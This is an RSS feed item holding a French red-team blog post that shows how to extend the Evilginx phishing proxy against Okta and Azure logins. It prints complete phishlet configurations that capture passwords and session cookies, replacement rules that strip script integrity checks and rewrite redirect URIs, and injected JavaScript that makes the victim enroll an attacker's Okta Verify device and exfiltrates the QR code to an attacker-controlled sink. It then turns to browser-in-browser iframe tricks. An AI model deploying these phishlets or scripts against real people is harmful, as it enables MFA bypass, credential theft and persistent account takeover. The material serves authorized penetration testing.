<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>phishing - RiskInsight</title>
	<atom:link href="https://www.riskinsight-wavestone.com/tag/phishing/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.riskinsight-wavestone.com/tag/phishing/</link>
	<description>Le blog cybersécurité des consultants Wavestone</description>
	<lastBuildDate>Thu, 22 Jan 2026 13:22:58 +0000</lastBuildDate>
	<language>fr-FR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://www.riskinsight-wavestone.com/wp-content/uploads/2024/02/Blogs-2024_RI-39x39.png</url>
	<title>phishing - RiskInsight</title>
	<link>https://www.riskinsight-wavestone.com/tag/phishing/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Phishing : Evilginx poussé à ses limites</title>
		<link>https://www.riskinsight-wavestone.com/2025/07/phishing-evilginx-pousse-a-ses-limites/</link>
					<comments>https://www.riskinsight-wavestone.com/2025/07/phishing-evilginx-pousse-a-ses-limites/#respond</comments>
		
		<dc:creator><![CDATA[Yoann DEQUEKER]]></dc:creator>
		<pubDate>Thu, 17 Jul 2025 15:03:17 +0000</pubDate>
				<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[Azure]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Ethical Hacking]]></category>
		<category><![CDATA[EvilGinx]]></category>
		<category><![CDATA[MFA]]></category>
		<category><![CDATA[Okta]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[Phislet]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=26611</guid>

					<description><![CDATA[<p>Les attaques par phishing sont aussi vieilles que l&#8217;internet. Cependant, au fil des ans, les techniques et les moyens utilisés pour le phishing changent, mais l&#8217;objectif final reste le même : obtenir un premier accès au réseau interne. Habituellement, les...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/07/phishing-evilginx-pousse-a-ses-limites/">Phishing : Evilginx poussé à ses limites</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[


<p style="text-align: justify;">Les attaques par phishing sont <strong>aussi vieilles que l&rsquo;internet</strong>. Cependant, au fil des ans, les techniques et les moyens utilisés pour le phishing changent, mais l&rsquo;objectif final reste le même : obtenir un premier accès au réseau interne.</p>
<p style="text-align: justify;">Habituellement, <strong>les <em>threat actors</em> tentent d&rsquo;envoyer des documents malveillants</strong> tels que des applications HTA ou des documents Office malveillants mais, avec le développement de solutions de sécurité SMTP telles que ProofPoint, le durcissement par défaut d&rsquo;Office lié aux macros et la sensibilisation accrue au phishing, <strong>ces types de techniques sont de moins en moins utilisés</strong>.</p>
<p style="text-align: justify;">Aujourd’hui, les attaques de phishing ne visent plus à obtenir un accès direct au réseau interne de l’entreprise, mais plutôt à <strong>récupérer l’identité numérique de l’utilisateur :</strong> son identité Office365, Google Workspace ou Okta. Cette identité est ensuite réutilisée via des applications SSO jusqu’à ce qu’une porte d’entrée soit identifiée, par le biais d’applications exposées comme Citrix ou un accès VPN.</p>
<p style="text-align: justify;">Pour limiter ce type d’attaques, <strong>les entreprises ont commencé à imposer l’utilisation de l’authentification multifacteur (MFA)</strong>, afin de garantir que, même si un acteur malveillant parvient à récupérer un jeu d’identifiants valides par phishing ou collecte, il ne puisse ni compléter le processus d’authentification ni réutiliser ces identifiants sur une autre application.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Phishing 101</h2>
<p> </p>
<h3 style="text-align: justify;">IDP, cookies et phishing</h3>
<p style="text-align: justify;">La protection MFA mise en place par les entreprises est <strong>un bon moyen de limiter l&rsquo;impact</strong> d&rsquo;un phishing réussi. En effet, même si l&rsquo;acteur de la menace récupère les informations d&rsquo;identification de l&rsquo;utilisateur, il ne sera pas en mesure d&rsquo;usurper l&rsquo;identité de l&rsquo;utilisateur puisqu&rsquo;il ne pourra pas valider le MFA.</p>
<p style="text-align: justify;">Cependant, aujourd&rsquo;hui, le MFA n&rsquo;est généralement demandé <strong>que lors de la première authentification</strong> : une fois que l&rsquo;utilisateur est authentifié auprès du fournisseur d&rsquo;identité, celui-ci lui fournit une preuve d&rsquo;authentification qu&rsquo;il peut transmettre à n&rsquo;importe quel service. Grâce à cette preuve d&rsquo;authentification, l&rsquo;utilisateur n&rsquo;a pas besoin d&rsquo;une authentification active supplémentaire et n&rsquo;a donc pas besoin de revalider le MFA tant que ce ticket est valide.</p>
<p style="text-align: justify;">Dans les IDP web les plus courants comme Azure, Google ou Okta, <strong>ce ticket est représenté par les cookies</strong>. Lorsque l&rsquo;utilisateur se connecte à l&rsquo;IDP pour la première fois, le service renvoie un cookie valable pendant 1 heure, 1 jour ou 2 ans. Avec ces cookies, l&rsquo;utilisateur peut se connecter à n&rsquo;importe quel autre service web compatible SSO sans authentification.</p>
<p style="text-align: center;"> </p>
<figure id="attachment_26612" aria-describedby="caption-attachment-26612" style="width: 973px" class="wp-caption aligncenter"><img fetchpriority="high" decoding="async" class=" wp-image-26612" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image1-1-238x191.png" alt="Schéma décrivant le maintient de la session par les cookies" width="973" height="781" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image1-1-238x191.png 238w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image1-1-49x39.png 49w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image1-1-768x616.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image1-1.png 1420w" sizes="(max-width: 973px) 100vw, 973px" /><figcaption id="caption-attachment-26612" class="wp-caption-text"><em>Session maintenue par des cookies</em></figcaption></figure>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">En résumé,<strong> les cookies IDP de l&rsquo;utilisateur représentent l&rsquo;identité numérique de l&rsquo;utilisateur</strong>. Par conséquent, dans une attaque de phishing dont l&rsquo;objectif principal est d&rsquo;usurper cette identité numérique de l&rsquo;utilisateur, l&rsquo;attaquant tentera de voler les cookies une fois que l&rsquo;utilisateur aura réussi son authentification.</p>
<p> </p>
<h3 style="text-align: justify;">Evilginx</h3>
<p> </p>
<h4 style="text-align: justify;">Evil proxy</h4>
<p style="text-align: justify;">Pour voler les cookies, l&rsquo;attaquant doit être placé dans une position <em>man-in-the-middle</em> au cours du processus d&rsquo;authentification. Cependant, avec la sécurité TLS imposée dans la majorité des IDP, <strong>l&rsquo;utilisateur aura conscience qu&rsquo;il se passe quelque chose d&rsquo;anormal</strong>.</p>
<p style="text-align: justify;">C&rsquo;est là qu&rsquo;<strong>Evilginx entre en jeu</strong>. Au lieu d&rsquo;effectuer une simple attaque de type « <em>man-in-the-middle</em> » en relayant le paquet vers l&rsquo;IDP, Evilginx crée un proxy malveillant :<strong> l&rsquo;utilisateur ne s&rsquo;authentifie pas sur accounts.google.com, mais il s&rsquo;authentifie sur login.evilginx.com</strong> :</p>
<figure id="attachment_26614" aria-describedby="caption-attachment-26614" style="width: 973px" class="wp-caption aligncenter"><img decoding="async" class=" wp-image-26614" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image2-399x191.png" alt="Schéma du fonctionnement d’Evilgproxy" width="973" height="466" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image2-399x191.png 399w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image2-71x34.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image2-768x367.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image2.png 947w" sizes="(max-width: 973px) 100vw, 973px" /><figcaption id="caption-attachment-26614" class="wp-caption-text"><em>Fonctionnement d’Evilgproxy</em></figcaption></figure>
<p>Je ne prendrai pas plus de temps pour développer le principe de proxy malveillant, car ce sujet est déjà bien documenté sur Internet.</p>
<p> </p>
<h4 style="text-align: justify;">Phislets 101</h4>
<p style="text-align: justify;">Par exemple, lors de l&rsquo;authentification à Azure, les domaines suivants sont utilisés :</p>
<ul>
<li>login.microsoftonline.com</li>
<li>www.microsoftonline.com</li>
<li>aadcdn.microsoftonline.com</li>
</ul>
<p style="text-align: justify;">Le problème est que pendant le processus d&rsquo;authentification, l&rsquo;IDP redirige l&rsquo;utilisateur vers des pages spécifiques avec le domaine codé en dur dans la réponse. Par exemple, lors d&rsquo;un processus d&rsquo;authentification SAML classique, l&rsquo;IDP forcera le client à effectuer une requête POST vers un domaine spécifique codé en dur. Par conséquent, même si l&rsquo;utilisateur a commencé son processus d&rsquo;authentification sur login.evilginx.com, il sera redirigé vers login.microsoftonline.com au cours du processus d&rsquo;authentification, ce qui rompt la position de l&rsquo;homme du milieu.</p>
<p style="text-align: justify;">Evilginx <strong>utilise des fichiers de configuration spécifiques connus sous le nom de phishlets pour gérer de tels cas</strong>. La configuration du phishlet permet à Evilginx de savoir quel domaine doit être réécrit dans la réponse du serveur. Ainsi, si l&rsquo;IDP renvoie une réponse telle que :</p>
<pre style="text-align: justify;">&lt;form id=”SAML” action=”https://login.microsoftonline.com”&gt;<br />[…]<br />&lt;/form&gt;<br />&lt;script&gt;<br />document.getElementById(“SAML”).click()<br />&lt;/script&gt;</pre>
<p style="text-align: justify;">Avec le phishlet, <strong>Evilginx saura que le domaine login.microsoftonline.com doit être réécrit</strong> et renverra à la cible la page modifiée suivante :</p>
<pre>&lt;form id=”SAML” action=”https://login.evilginx.com”&gt;<br />[…]<br />&lt;/form&gt;<br />&lt;script&gt;<br />document.getElementById(“SAML”).click()<br />&lt;/script&gt;</pre>
<p style="text-align: justify;">Avec un tel modèle de correspondance et de remplacement,<strong> Evilginx est capable de maintenir l&rsquo;utilisateur dans l&rsquo;application malveillante</strong> même si l&rsquo;IDP tente de rediriger l&rsquo;utilisateur vers une page spécifique.</p>
<p> </p>
<h4 style="text-align: justify;">Limites du remplacement automatique</h4>
<p style="text-align: justify;">Le remplacement automatique des phishlets Evilginx a ses limites. En effet, <strong>il arrive que le serveur n’indique pas directement le domaine en dur dans la page,</strong> mais qu&rsquo;il le construise par le biais d&rsquo;un script JS.</p>
<p style="text-align: justify;">Dans ce cas, Evilginx n&rsquo;est pas en mesure de détecter automatiquement le motif du domaine. En tant que concepteurs de phishlets, nous devons alors comprendre comment le script fonctionne et remplacer manuellement la partie construisant le domaine de redirection par une correspondance/un remplacement.</p>
<h5> </h5>
<h5>CORS</h5>
<p style="text-align: justify;">Dans Okta, le flux d&rsquo;authentification est basé sur plusieurs scripts JS récupérés sur le domaine oktadcn. Le script <strong>construit dynamiquement l&rsquo;URL de redirection</strong> : il prend le nom du locataire Okta et ajoute « okta.com ». Par conséquent, lorsque Okta tente d&rsquo;atteindre la page spécifique en utilisant le domaine okta.com,<strong> il échoue en raison de la protection CORS</strong> (tentative d&rsquo;atteindre okta.com/idp/idx/introspect à partir de evilginx.com) :</p>
<figure id="attachment_26627" aria-describedby="caption-attachment-26627" style="width: 1009px" class="wp-caption alignnone"><img decoding="async" class=" wp-image-26627" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image3-367x191.png" alt="Image montrant l'erreur provoquée par les CORS d'okta" width="1009" height="525" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image3-367x191.png 367w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image3-71x37.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image3-768x400.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image3.png 849w" sizes="(max-width: 1009px) 100vw, 1009px" /><figcaption id="caption-attachment-26627" class="wp-caption-text"><em>Les CORS Okta</em></figcaption></figure>
<p style="text-align: justify;">En déboguant l&rsquo;application, il est possible de trouver l&rsquo;endroit où la construction de l&rsquo;URL est effectuée et de la modifier en remplaçant le motif correspondant :</p>
<pre style="text-align: justify;"><u>Replace:</u> array");var t=<br /><u>By:</u> array");e.redirectUri=e.redirectUri.replace("okta.com","evilginx.com");var t=</pre>
<p style="text-align: justify;">Avec cette simple indication, Evilginx remplacera tout motif correspondant, <strong>évitant ainsi la redirection de l&rsquo;utilisateur en dehors de l&rsquo;application de phishing.</strong></p>
<h5> </h5>
<h5 style="text-align: justify;">Intégrité du JS</h5>
<p style="text-align: justify;">Lorsque l&rsquo;on modifie le fichier JS ou tout autre fichier via Evilginx,<strong> cela peut causer des problèmes en raison du hash d’intégrité du script</strong> :</p>
<pre style="text-align: justify;">&lt;script src="https://ok14static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.30.1/js/okta-sign-in.min.js" type="text/javascript" integrity="sha384-EX0iPfWYp6dfAnJ+ert/KRhXwMapYJdnU2i5BbbeOhWyX0qyI4rMkxKKl8N5pXNI" crossorigin="anonymous"/&gt;</pre>
<p style="text-align: justify;">En effet, si Evilginx modifie le script okta-signing-widget, son hash ne correspondra pas à celui défini dans le fichier html et l&rsquo;application refusera de le charger.</p>
<figure id="attachment_26684" aria-describedby="caption-attachment-26684" style="width: 1165px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-26684" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/hash-437x48.png" alt="Image montrant l'erreur liée au hash d’intégrité" width="1165" height="128" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/hash-437x48.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/hash-71x8.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/hash-768x85.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/hash-1536x170.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/hash.png 1737w" sizes="auto, (max-width: 1165px) 100vw, 1165px" /><figcaption id="caption-attachment-26684" class="wp-caption-text"><em>Erreur liée au hash d’intégrité</em></figcaption></figure>
<p style="text-align: justify;">Avec Evilginx, nous pouvons également modifier la page html pour supprimer le contrôle d&rsquo;intégrité :</p>
<pre style="text-align: justify;">Replace: integrity="[^"]*"<br />By: integrity=''</pre>
<h5> </h5>
<h5 style="text-align: justify;">Validation de l&rsquo;URI de redirection</h5>
<p style="text-align: justify;">Le dernier point est <strong>la validation de l&rsquo;URI de redirection</strong>. En effet, lors de l&rsquo;authentification OIDC, le client sera redirigé vers une page dont l&rsquo;URL est du type :</p>
<pre style="text-align: justify;">/oauth2/v1/authorize?client_id=XXXXXX&amp;redirect_uri=https://trial-xxxxx.okta.com[...]</pre>
<p style="text-align: justify;">Avec le remplacement automatique de domaine configuré sur Evilginx, le paramètre URI de redirection trial-xxxx.okta.com sera automatiquement changé en trial-xxxxx.evilginx.com.</p>
<p style="text-align: justify;">Cela déclenchera le processus de validation de l&rsquo;uri de redirection. Le domaine evilginx.com n&rsquo;ayant pas été configuré du côté d&rsquo;Okta comme un domaine de redirection valide,<strong> Okta affichera l&rsquo;erreur suivante :</strong></p>
<figure id="attachment_26631" aria-describedby="caption-attachment-26631" style="width: 250px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-26631" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image5-175x191.png" alt="Image montrant l'erreur  400 - Bad Request dans Okta" width="250" height="273" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image5-175x191.png 175w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image5-36x39.png 36w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/Image5.png 269w" sizes="auto, (max-width: 250px) 100vw, 250px" /><figcaption id="caption-attachment-26631" class="wp-caption-text"><em>Erreur dans Okta</em></figcaption></figure>
<p style="text-align: justify;">L&rsquo;URI de redirection est <strong>construit dynamiquement par Okta en prenant le domaine de connexion </strong>et en ajoutant les paramètres de rappel. Il est donc possible de contourner cette erreur en modifiant le script JS qui construit l&rsquo;URL et en s&rsquo;assurant que l&rsquo;URI de rappel est celui attendu par Okta :</p>
<p style="text-align: justify;">En utilisant Evilginx, il est<strong> possible d&rsquo;utiliser un motif qui sera remplacé pour réinitialiser le redirect_uri </strong>à la bonne URI :</p>
<pre style="text-align: justify;"><u>Replace:</u> ,l.src=e.getIssuerOrigin()<br /><u>By:</u> ,l.src=e.getIssuerOrigin().replace("evilginx.com","okta.com")<br /><br /><u>Replace:</u> var s=(n.g.fetch||h())(t<br /><u>By:</u> ,l.src=e.getIssuerOrigin().replace("evilginx.com","okta.com")</pre>
<h4> </h4>
<h4 style="text-align: justify;">Phishlets basiques</h4>
<h5 style="text-align: justify;">Okta</h5>
<pre style="text-align: justify;">min_ver: '3.0.0'<br />name: 'okta-wavestone'<br /><br />params:<br />  - name: okta_orga<br />    default: ''<br />    required: true<br />  - name: redirect_server<br />    default: https://google.com<br /><br />proxy_hosts:<br />  - phish_sub: '{okta_orga}'<br />    orig_sub: '{okta_orga}'<br />    domain: okta.com<br />    session: true<br />    is_landing: true<br />    auto_filter: true<br /><br />  - phish_sub: ok14static<br />    orig_sub: ok14static<br />    domain: oktacdn.com<br />    session: false<br />    is_landing: false<br />    auto_filter: true<br /><br />  - phish_sub: login<br />    orig_sub: login<br />    domain: okta.com<br />    session: false<br />    is_landing: false<br />    auto_filter: true<br /><br />sub_filters:<br />  - triggers_on: 'ok14static.oktacdn.com'<br />    orig_sub: ''<br />    domain: 'okta.com'<br />    search: 'array"\);var t='<br />    replace: 'array");e.redirectUri=e.redirectUri.replace("{basedomain}","{orig_domain}");var t='<br />    mimes: ['application/javascript']<br /><br />  - triggers_on: '{okta_orga}.okta.com'<br />    orig_sub: ''<br />    domain: 'okta.com'<br />    search: integrity="[^"]*"<br />    replace: integrity=''<br />    mimes: ['text/html', 'charset=utf-8']<br /><br />  - triggers_on: '{okta_orga}.okta.com'<br />    orig_sub: ''<br />    domain: 'okta.com'<br />    search: 'mainScript\.integrity'<br />    replace: 'mainScript.inteegrity'<br />    mimes: ['text/html', 'charset=utf-8']<br /><br />  - triggers_on: 'ok14static.oktacdn.com'<br />    orig_sub: ''<br />    domain: 'okta.com'<br />    search: 'var s=\(n\.g\.fetch\|\|h\(\)\)\(t'<br />    replace: 't=t.replace("{orig_domain}","{domain}");var s=(n.g.fetch||h())(t'<br />    mimes: ['application/javascript']<br /><br />  - triggers_on: 'ok14static.oktacdn.com'<br />    orig_sub: ''<br />    domain: 'okta.com'<br />    search: ',l\.src=e\.getIssuerOrigin\(\)'<br />    replace: ',l.src=e.getIssuerOrigin().replace("{orig_domain}","{domain}")'<br />    mimes: ['application/javascript']<br /><br />  - triggers_on: 'ok9static.oktacdn.com'<br />    orig_sub: ''<br />    domain: 'okta.com'<br />    search: ',l\.src=e\.getIssuerOrigin\(\)'<br />    replace: ',l.src=e.getIssuerOrigin().replace("{orig_domain}","{domain}")'<br />    mimes: ['application/javascript']<br /><br />auth_tokens:<br />  - domain: '{okta_orga}.okta.com'<br />    keys: ['idx:always']<br /><br />credentials:<br />  username:<br />    key: ''<br />    search: '"identifier":"([^"]*)"'<br />    type: 'json'<br /><br />  password:<br />    key: 'passwd'<br />    search: '(.*)'<br />    type: 'post'<br /><br />login:<br />  domain: '{okta_orga}.okta.com'<br />  path: '/'<br /><br />force_post:<br />  - path: '/kmsi'<br />    search:<br />      - {key: 'LoginOptions', search: '.*'}<br />    force:<br />      - {key: 'LoginOptions', value: '1'}<br />    type: 'post'</pre>
<p style="text-align: justify;"> </p>
<h5 style="text-align: justify;">Azure</h5>
<pre>name: 'o365-wavestone'<br />min_ver: '3.0.0'<br /><br />proxy_hosts:<br />  - phish_sub: 'login'<br />    orig_sub: 'login'<br />    domain: 'microsoftonline.com'<br />    session: true<br />    is_landing: true<br /><br />  - phish_sub: 'www'<br />    orig_sub: 'www'<br />    domain: 'office.com'<br />    session: true<br />    is_landing:false<br /><br />  - phish_sub: 'aadcdn'<br />    orig_sub: 'aadcdn'<br />    domain: 'msftauth.net'<br />    session: false<br />    auto_filter: true<br />    is_landing:false<br /><br />auth_tokens:<br />  - domain: '.login.microsoftonline.com'<br />    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']<br />  - domain: 'login.microsoftonline.com'<br />    keys: ['SignInStateCookie']<br /><br />credentials:<br />  username:<br />    key: 'login'<br />    search: '(.*)'<br />    type: 'post'<br />  password:<br />    key: 'passwd'<br />    search: '(.*)'<br />    type: 'post'<br /><br />auth_urls:<br />  - '/common/SAS/ProcessAuth'<br />  - '/kmsi'<br /><br />login:<br />  domain: 'login.microsoftonline.com'<br />  path: '/'<br /><br />force_post:<br />  - path: '/kmsi'<br />    search:<br />      - {key: 'LoginOptions', search: '.*'}<br />    force:<br />      - {key: 'LoginOptions', value: '1'}<br />    type: 'post'<br /><br />  - path: '/common/SAS'<br />    search:<br />      - {key: 'rememberMFA', search: '.*'}<br />    force:<br />      - {key: 'rememberMFA', value: 'true'}<br />    type: 'post'</pre>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Automatiser les actions critiques</h2>
<p> </p>
<h3 style="text-align: justify;">Ajouter un nouvel appareil au MFA</h3>
<p style="text-align: justify;">Une fois qu&rsquo;un attaquant est en mesure de récupérer un accès initial à la session de l&rsquo;utilisateur, il doit mettre en place une persistance de l&rsquo;accès car les cookies ont une durée de validité limitée.</p>
<p style="text-align: justify;">Cela se fait généralement en ajoutant un nouvel appareil au MFA associé au compte de l&rsquo;utilisateur.</p>
<p style="text-align: justify;">Par exemple, sur Azure, l’ajout d’un dispositif MFA ne nécessite pas de réauthentification ou de validation MFA. Ainsi,<strong> tant que l’attaquant a accès à la session utilisateur, il peut directement enregistrer son dispositif MFA malveillant</strong>.</p>
<p style="text-align: justify;">En revanche, sur certaines plateformes d’identification comme <strong>Okta, l’enregistrement d’un MFA exige une validation MFA préalable</strong>. Même si un attaquant parvient à compromettre la session Okta de l’utilisateur, il ne pourra pas ajouter un dispositif MFA directement.</p>
<p style="text-align: justify;">Il pourrait être intéressant d’ajouter cette étape de réauthentification dans le scénario d’attaque par phishing :</p>
<ol style="text-align: justify;">
<li>L’utilisateur s’authentifie une première fois pour accéder à sa session</li>
<li>Evilginx vole les cookies de session</li>
<li>Evilginx effectue des appels API automatiques pour déclencher l’enregistrement de l’appareil MFA en arrière-plan</li>
<li>L’utilisateur revalide son MFA, pensant que la première tentative a échoué</li>
<li>Evilginx intercepte le QR Code MFA, permettant à l’attaquant de finaliser l’enregistrement de son propre appareil</li>
</ol>
<p style="text-align: justify;">Toutes ces actions <strong>peuvent être automatisées via Evilginx en modifiant les scripts JS.</strong></p>
<p style="text-align: justify;">Dans un premier temps, Evilginx interceptera la redirection effectuée à la fin de la première authentification, et redirigera l’utilisateur vers une fausse page contrôlée par l’attaquant.</p>
<pre style="text-align: justify;">  - trigger_domains: ['{okta_orga}.okta.com']<br />    trigger_paths: ['/app/UserHome']<br />    script: |<br />  if(document.referrer.indexOf('/enduser/callback') != -1){document.location = 'https://'+window.location.hostname+'/help/login'}</pre>
<p style="text-align: justify;">Ce script <strong>sera injecté uniquement dans la page /app/UserHome et ne sera déclenché que lorsque cette page est accédée depuis /enduser/callback</strong>. Cela garantit que l’utilisateur est redirigé vers une page de leurre uniquement une fois que le premier processus d’authentification est terminé. Dans ce cas précis, la page de leurre est la page /help/login d’Okta. Cette redirection vers une page de leurre est indispensable, sinon l’utilisateur reste bloqué dans <strong>une boucle de redirection infinie à la fin de son authentification</strong>.</p>
<p style="text-align: justify;">Ensuite,<strong> un nouveau code JS est ajouté à la page /help/login</strong>. Ce script permet d’énumérer les technologies MFA disponibles et configurées :</p>
<pre style="text-align: justify;">  - trigger_domains: ['{okta_orga}.okta.com']<br />    trigger_paths: ['/help/login']<br />    script: |<br />      function u4tyd783z(){<br />        fetch('/api/v1/authenticators')<br />        .then((data) =&gt; {<br />            data.json().then((jData)=&gt;{<br />                let id = undefined<br />                for(let elt of jData){<br />                    if(elt.key == 'okta_verify'){<br />                        id = elt.id<br />                    }<br />                }<br />                if(id == undefined){<br />                    return<br />                }<br />                console.log('https://'+window.location.hostname+'/idp/authenticators/setup/'+id)<br />                document.location = 'https://'+window.location.hostname+'/idp/authenticators/setup/'+id<br />            })<br />        })<br />      }<br />      u4tyd783z();</pre>
<p style="text-align: justify;">Le script <strong>sélectionne la méthode d’authentification “Okta Verify” </strong>et redirige l’utilisateur vers la page de configuration.</p>
<p style="text-align: justify;">Sur cette page de configuration, un nouveau script JS est injecté. <strong>Ce script automatise les étapes d’enregistrement afin de ne laisser visible que le formulaire de validation MFA</strong> :</p>
<pre style="text-align: justify;">- trigger_domains: ['{okta_orga}.okta.com']<br />    trigger_paths: ['/idp/authenticators/setup/.*']<br />    script: |<br />      function u720dhfn2(){<br />        if(document.querySelectorAll('.button.select-factor.link-button').length &gt; 0){<br />            document.querySelectorAll('.button.select-factor.link-button')[0].click()<br />            document.querySelectorAll('body')[0].style.display = 'none'<br />            a = true<br />        }<br />        if(document.querySelectorAll('a.orOnMobileLink').length &gt; 0){<br />            document.querySelectorAll('a.orOnMobileLink')[0].click()<br />            b = true<br />        }<br />        if(document.querySelectorAll('img.qrcode').length &gt; 0){<br />            fetch("{qrcode_sink}", {<br />              method: 'POST',<br />              body: JSON.stringify({code: document.querySelectorAll('img.qrcode')[0].getAttribute('src')})<br />            }).then(()=&gt;{<br />              document.location='{redirect_server}'<br />            }).catch(()=&gt;{<br />              document.location='{redirect_server}'<br />            })<br /><br />            clearInterval(myInterval)<br />        }<br />      }<br />      var a = false<br />      var b = false<br />      var myInterval = setInterval(function(){u720dhfn2()}, 10)</pre>
<p style="text-align: justify;">Une fois que l’utilisateur a validé l’authentification <strong>MFA, le script repère le QR Code affiché et l’exfiltre via une requête HTTP.</strong></p>
<p style="text-align: justify;">L’attaquant peut alors récupérer ce QR Code et enregistrer son propre appareil.</p>
<p style="text-align: justify;"> </p>
<h2 style="text-align: justify;">Aller plus loin</h2>
<p> </p>
<h3 style="text-align: justify;">Okta avec l’authentification Azure</h3>
<p style="text-align: justify;">Certaines entreprises associent deux fournisseurs d&rsquo;identité (IdP) :<strong> Okta redirige vers Azure et crée automatiquement le compte utilisateur lors de la première connexion.</strong></p>
<p style="text-align: justify;">Cette configuration est particulièrement intéressante pour un attaquant, car elle lui permet d’exfiltrer les sessions Azure et Okta à l’aide d’un seul phishing.</p>
<p style="text-align: justify;">Pour ce faire, les deux phislets précédents doivent<strong> être fusionnés afin de capturer les deux processus d’authentification.</strong> L’essentiel est de s’assurer qu’Okta redirige vers le domaine Azure Evilginx, et non vers login.microsoftonline.com.</p>
<p style="text-align: justify;">Heureusement, cette redirection est effectuée via un formulaire HTML en clair qui est soumis automatiquement dans la réponse d’Okta :</p>
<pre style="text-align: justify;">&lt;form id="appForm" action="https://login.microsoftonline.com/7ee59529-c0a4-4d72-82e4-3ec0952b49f4/saml2" method="POST"&gt;[...]&lt;/form&gt;</pre>
<p style="text-align: justify;">Comme le domaine Azure est codé en dur dans le HTML, Evilginx peut le remplacer</p>
<p style="text-align: justify;">De même, une fois l’authentification terminée chez Microsoft, la redirection vers Okta peut être interceptée, et Evilginx peut substituer le domaine Okta réel par son équivalent malveillant, permettant ainsi la récupération du cookie de session Azure.</p>
<p style="text-align: justify;">En résumé<em>, </em><strong>dans cette configuration spécifique, il est possible de simplement fusionner les deux phislets précédents.</strong></p>
<h3> </h3>
<h3 style="text-align: justify;">Frame buster</h3>
<p style="text-align: justify;">De plus en plus d’utilisateurs vérifient l’URL d’authentification avant de saisir leurs identifiants. Pour contourner cette vérification, il est possible d’utiliser la technique dite du “Browser-in-Browser”.</p>
<p style="text-align: justify;">L’idée est d’intégrer l’application de phishing dans une iframe et de construire une fausse interface ressemblant à une fenêtre Chrome autour de cette iframe, afin de faire passer cette dernière pour une pop-up légitime.</p>
<p style="text-align: justify;">Étant donné que l’apparence de la fenêtre est entièrement recréée, il devient possible d’y afficher une fausse adresse. Dans la figure ci-dessous, un formulaire Google est intégré via une iframe mais donne l’impression d’une véritable pop-up:</p>
<figure id="attachment_26689" aria-describedby="caption-attachment-26689" style="width: 969px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class=" wp-image-26689" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/browser_in_browser-374x191.png" alt="Image montrant la technique du de &quot;Browser-in-browser&quot;, avec l'affichage d'une fausse pop up qui montre une url de confiance" width="969" height="495" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/browser_in_browser-374x191.png 374w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/browser_in_browser-71x36.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/07/browser_in_browser.png 680w" sizes="auto, (max-width: 969px) 100vw, 969px" /><figcaption id="caption-attachment-26689" class="wp-caption-text"><em>Exemple de « Browser-in-browser »</em></figcaption></figure>
<p style="text-align: justify;">Le principal problème ici est que la plupart des formulaires d’authentification des fournisseurs d’identité (IdP) mettent en œuvre plusieurs techniques pour empêcher leur intégration dans une iframe. Ces techniques sont appelées <em>framebusters</em>.</p>
<p style="text-align: justify;">Bien qu’Okta ne semble pas appliquer de telles protections, le formulaire d’authentification d’Azure contient de nombreuses fonctionnalités qui cesseraient de fonctionner s’il était intégré dans une iframe.</p>
<h4> </h4>
<h4 style="text-align: justify;">Self == top</h4>
